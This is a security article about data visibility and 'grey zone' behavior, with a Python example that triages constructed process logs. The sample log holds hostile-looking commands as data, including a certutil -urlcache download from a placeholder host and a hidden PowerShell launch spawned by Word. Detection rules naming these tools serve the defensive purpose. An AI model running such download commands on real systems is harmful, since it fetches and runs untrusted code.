In today’s late-pandemic, high-threat world, data visibility has become the critical success factor for security teams as they navigate a murky “grey zone” of user behavior and anomalies across vastly larger sets of data.
Nowadays, responding to a digital security incident goes far beyond marking files or artifacts as malicious or clean and simply removing them. That approach may have solved the problem in the past, but the context in which files run has become too complex for it to be sufficient.
Threat actors continue to become more sophisticated in the execution of their attacks every year, while the transition to remote work adds significant challenges to corporate security. Across the board, digital security has become much less black and white.
Within this “grey zone,” whether activity is malicious or legitimate is defined mainly by its behavior, or by an anomaly that makes the activity out of the ordinary, and not just by a signature provided by an AV (anti-virus tool). A signature match is still useful, but on its own it guarantees little.
In other words, files perceived as clean can (and, unfortunately, will) be used for a malicious purpose, just as files marked as malicious may in fact be legitimate. For example, even properly used IT troubleshooting tools can appear as elements of a cyberattack, and the same tool in the hands of an attacker looks identical at the file level; only the context (who ran it, from where, and what it did) separates the two cases.
At this point, improving the security posture means generating visibility over data and activity. The goal should be to determine the scope and nature of specific activity by inspecting detailed blocks of logged data and activity, rather than by inspecting the file in isolation.
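To make the “grey zone” concrete, the following is an added example, not code from the original article: it runs a signature check and a small set of behavioral rules over a few constructed process-creation log records and shows where the two disagree. The log format, the tool and user lists, the hash values and the triage policy are all illustrative assumptions, not the output of any real product; the example generalizes the point above by letting the same binary land in three different verdicts depending on context.

```python
"""Signature match versus behavioral context on process-creation events.

Added illustration (not from the original article). Every record, hash and
list below is constructed for the example; the triage policy is a hypothetical
one, chosen to show why signature-only verdicts are not enough.
"""
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample log: one record per line, pipe-separated fields
# timestamp|user|parent image|image|command line|sha256 (hashes are fake).
SAMPLE_LOG = """\
2023-03-01T09:12:04Z|alice|explorer.exe|psexec.exe|psexec.exe \\\\fs01 -s cmd /c gpupdate /force|aaaa0001
2023-03-01T09:14:37Z|bob|winword.exe|powershell.exe|powershell.exe -w hidden -c (redacted in sample)|aaaa0002
2023-03-01T10:02:11Z|alice|explorer.exe|psexec.exe|psexec.exe \\\\fs02 -s cmd /c sfc /scannow|deadbeef01
2023-03-01T10:45:59Z|carol|explorer.exe|certutil.exe|certutil.exe -urlcache -split -f http://files.example/update.bin update.bin|aaaa0003
"""

# Hypothetical context the security team maintains (not from the article).
KNOWN_BAD_HASHES = {"deadbeef01"}          # what the AV signature feed flags
ADMIN_TOOLS = {"psexec.exe", "certutil.exe", "powershell.exe"}
DOCUMENT_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
IT_ADMINS = {"alice"}


@dataclass
class ProcessEvent:
    ts: str
    user: str
    parent: str
    image: str
    cmdline: str
    sha256: str


def parse_log(text: str) -> List[ProcessEvent]:
    """Parse the constructed pipe-separated format, rejecting malformed records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split("|")
        if len(fields) != 6:
            raise ValueError(f"malformed record: {line!r}")
        events.append(ProcessEvent(*fields))
    return events


def signature_verdict(ev: ProcessEvent) -> str:
    """The black-and-white view: is the file hash on the bad list or not?"""
    return "alert" if ev.sha256 in KNOWN_BAD_HASHES else "clean"


def behaviour_findings(ev: ProcessEvent) -> List[str]:
    """The grey-zone view: what did the process do, and is that out of the ordinary?"""
    findings = []
    image, parent = ev.image.lower(), ev.parent.lower()
    if image in ADMIN_TOOLS and parent in DOCUMENT_APPS:
        findings.append(f"{ev.image} spawned by document application {ev.parent}")
    if image in ADMIN_TOOLS and ev.user not in IT_ADMINS:
        findings.append(f"{ev.image} run by non-admin account {ev.user}")
    if image == "certutil.exe" and "urlcache" in ev.cmdline.lower():
        findings.append("certutil used to fetch remote content")
    return findings


def triage(ev: ProcessEvent) -> Dict[str, object]:
    """Combine both views under a hypothetical policy.

    - any behavioral finding -> alert, whatever the signature says
    - signature hit with no findings -> review if an IT admin ran it, else alert
    - nothing -> clean
    """
    sig = signature_verdict(ev)
    findings = behaviour_findings(ev)
    if findings:
        verdict = "alert"
    elif sig == "alert":
        verdict = "review" if ev.user in IT_ADMINS else "alert"
    else:
        verdict = "clean"
    return {"ts": ev.ts, "user": ev.user, "image": ev.image,
            "signature": sig, "findings": findings, "verdict": verdict}


def run_triage(log_text: str) -> List[Dict[str, object]]:
    return [triage(ev) for ev in parse_log(log_text)]


if __name__ == "__main__":
    for r in run_triage(SAMPLE_LOG):
        print(f"{r['ts']} {r['user']:6} {r['image']:15} signature={r['signature']:5} "
              f"verdict={r['verdict']:6} {'; '.join(r['findings'])}")
```

Records 2 and 4 are signature-clean but produce alerts, because a document application spawning PowerShell and certutil fetching remote content are behaviors, not file properties. Record 3 is the reverse case: the hash is on the bad list (AV products commonly flag remote-execution tools), but an IT administrator ran it from the desktop shell with an ordinary maintenance command, so the hypothetical policy routes it to review instead of blocking it outright. None of those distinctions are visible without the surrounding log data.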
The Benefits of Real-Time Data Visibility
Real-time data visibility allows security teams to understand what is actually happening, as it happens. This level of immediate insight gives them accurate context around user behavior at a given point in time, speeding awareness of issues and reducing the time needed to correct them.
- Rethinking Trust in the Company – This is not only a technical issue. To achieve data visibility in a meaningful way, companies need to rethink how they build trusting relationships between users and the security team. Users need to understand that security is not a barrier to productivity, and security engineers need to appreciate user concerns about being monitored. In the end, security is about protecting the assets and interests of the company, and everyone needs to be on board with that.
- Speeding Incident Response – Real-time visibility is the tool we use to respond to attacks with immediacy. Incident response, known as IR, dictates that reaction should be as fast as possible. That sounds great, but in practice it is too often a challenge, especially against the most devious attacks. The solution is a new level of vigilance across the company, so that the context of an event can be understood and the response can be both quick and appropriate.
- Improving Compliance – Besides security, real-time visibility can help improve compliance, which has itself become more complex during the pandemic. Today, in the wake of remote working, most companies allow employees to use company devices for personal needs. This kind of convenience brings the obvious risk of company assets being used in ways that could lead to security breaches as well as compliance and other legal issues. You don’t need to be afraid of “Big Brother” watching your every move to agree that certain uses should be out of bounds, such as torrents, pirated software or the installation of games.
Each Company Must Choose its Security Path
At the end of the day, cybersecurity is a company-wide effort intended to prevent financial losses, prevent poor infrastructure performance and avoid creating a negative image for the company.
Everyone has a role to play.
That is why communication with users is vital, so that employees appreciate the goals of the security team and, by interacting directly with its members, even learn to identify possible threats themselves. This approach builds trust in the process across all levels of the organization.
Of course, each company must balance its risks and choose its own path. The ideal case described above requires prerequisites such as planning, investment and an ongoing commitment to mature from a security perspective.
Risk managers need to help define the security posture by deciding which risks are acceptable and which are not, taking into consideration the size of the company, the domain in which it operates, and the potential impact of a data breach.
At the end of the day, each company needs to decide what’s worth protecting and what that protection is worth.